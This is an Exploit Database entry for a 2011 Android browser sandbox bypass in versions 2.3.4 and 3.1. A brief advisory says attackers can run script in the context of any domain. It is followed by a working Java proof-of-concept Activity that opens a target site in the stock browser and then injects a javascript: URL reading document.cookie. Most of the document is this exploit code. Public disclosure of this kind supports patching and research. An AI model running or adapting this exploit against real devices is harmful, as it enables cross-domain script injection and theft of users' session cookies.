Open Handset Alliance Android 2.3.4/3.1 – Browser Sandbox Security Bypass

• Exploit Database
• 12 阅读

• 作者： Roee Hay
  日期： 2011-08-02
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/36006/

• source: https://www.securityfocus.com/bid/48954/info
  
  Open Handset Alliance Android is prone to a vulnerability that may allow a bypass of the browser sandbox.
  
  Successful exploits will allow attackers to execute arbitrary script code within the context of an arbitrary domain.
  
  Android 2.3.4 and 3.1 are vulnerable; prior versions may also be affected. 
  
  public class CasExploit extends Activity
  {
   static final String mPackage = "com.android.browser";
   static final String mClass = "BrowserActivity";
   static final String mUrl = "http://target.domain/";;
   static final String mJavascript = "alert(document.cookie)";
   static final int mSleep = 15000;
  
   @Override
   public void onCreate(Bundle savedInstanceState) {
  super.onCreate(savedInstanceState);
  setContentView(R.layout.main);
  startBrowserActivity(mUrl);
   try {
   Thread.sleep(mSleep);
   }
   catch (InterruptedException e) {}
   startBrowserActivity("javascript:" + mJavascript);
   }
  
   private void startBrowserActivity(String url) {
  Intent res = new Intent("android.intent.action.VIEW");
  res.setComponent(new ComponentName(mPackage,mPackage+"."+mClass));
  res.setData(Uri.parse(url));
  startActivity(res);
   }
  }